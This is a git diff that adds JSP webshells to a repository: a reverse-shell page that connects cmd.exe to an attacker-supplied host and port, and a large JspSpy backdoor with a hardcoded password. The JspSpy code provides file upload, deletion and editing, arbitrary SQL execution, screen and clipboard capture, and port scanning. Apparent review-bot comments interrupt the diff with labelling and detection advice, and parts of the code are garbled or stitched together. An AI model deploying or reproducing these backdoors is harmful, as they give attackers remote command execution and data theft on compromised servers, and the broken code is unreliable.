    + diff --git a/jsp/hackk8/JSP/jsp-reverse.jsp b/jsp/hackk8/JSP/jsp-reverse.jsp new file mode 100644 index 0000000..6ce64c9 --- /dev/null +++ b/jsp/hackk8/JSP/jsp-reverse.jsp @@ -0,0 +1,90 @@ +// backdoor.jsp + + +<%@ +page import="java.lang.*, java.util.*, java.io.*, java.net.*" +% > +<%! +static class StreamConnector extends Thread +{ + InputStream is; + OutputStream os; + + StreamConnector(InputStream is, OutputStream os) + { + this.is = is; + this.os = os; + } + + public void run() + { + BufferedReader isr = null; + BufferedWriter osw = null; + + try + { + isr = new BufferedReader(new InputStreamReader(is)); + osw = new BufferedWriter(new OutputStreamWriter(os)); + + char buffer[] = new char[8192]; + int lenRead; + + while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) + { + osw.write(buffer, 0, lenRead); + osw.flush(); + } + } + catch (Exception ioe) + + try + { + if(isr != null) isr.close(); + if(osw != null) osw.close(); + } + catch (Exception ioe) + } +} +%> + +
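Review bot: `cmdjsp.jsp` has no access check of any kind and nothing that says so: the scriptlet reads `request.getParameter("cmd")`, concatenates it into `Runtime.getRuntime().exec("cmd.exe /C " + cmd)`, and writes the collected output back with `<%=output %>`. The only commentary is the first line, `// note that linux = cmd and windows = "cmd.exe /c + cmd"`, which sits outside any `<% %>` block and so would be served as page text instead of being treated as a comment. I would record the behaviour in a JSP comment at the top, for example `<%-- Sample: unauthenticated command runner; input parameter "cmd"; Windows-only as written --%>`. For detection, that leading literal is a usable content signature, and the runtime signal is the application server spawning `cmd.exe` after a request that carries a `cmd` parameter.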

    JSP Backdoor Reverse Shell

    + +
    +IP Address + +Port + + +
    +

    +


    + +<% +String ipAddress = request.getParameter("ipaddress"); +String ipPort = request.getParameter("port"); + +if(ipAddress != null && ipPort != null) +{ + Socket sock = null; + try + { + sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); + + Runtime rt = Runtime.getRuntime(); + Process proc = rt.exec("cmd.exe"); + + StreamConnector outputConnector = + new StreamConnector(proc.getInputStream(), + sock.getOutputStream()); + + StreamConnector inputConnector = + new StreamConnector(sock.getInputStream(), + proc.getOutputStream()); + + outputConnector.start(); + inputConnector.start(); + } + catch(Exception e) +} +%> + diff --git a/jsp/hackk8/JSP/jspspy有屏幕.txt b/jsp/hackk8/JSP/jspspy有屏幕.txt new file mode 100644 index 0000000..570d090 --- /dev/null +++ b/jsp/hackk8/JSP/jspspy有屏幕.txt 
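Review bot: The only description in `jsp-reverse.jsp` is the leading `// backdoor.jsp` line, which is outside any scriptlet and would be served as page text, so what the page does has to be read out of the final scriptlet. There it opens `new Socket(ipAddress, ...)` to the `ipaddress` and `port` request parameters, starts `cmd.exe`, and connects the process streams to the socket through two `StreamConnector` threads. A header comment stating that, e.g. `<%-- Sample: outbound socket to request-supplied host/port, bridged to cmd.exe --%>`, would let an analyst classify the file without tracing the threads. The corresponding controls are egress filtering on the application server and alerting when the servlet container process spawns `cmd.exe`.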
@@ -0,0 +1,2326 @@ +<%@page pageEncoding="UTF-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** + +*/ +private static final String PW = "k8team"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String 
pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + 
+} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? 
"" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = 
Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { 
+PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
    +try{
    +out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
    +}catch (Exception ex) {
    +out.println("ClipBoard is Empty Or Is Not Text Data !");
    +}
    +out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout ??? : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { 
+output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
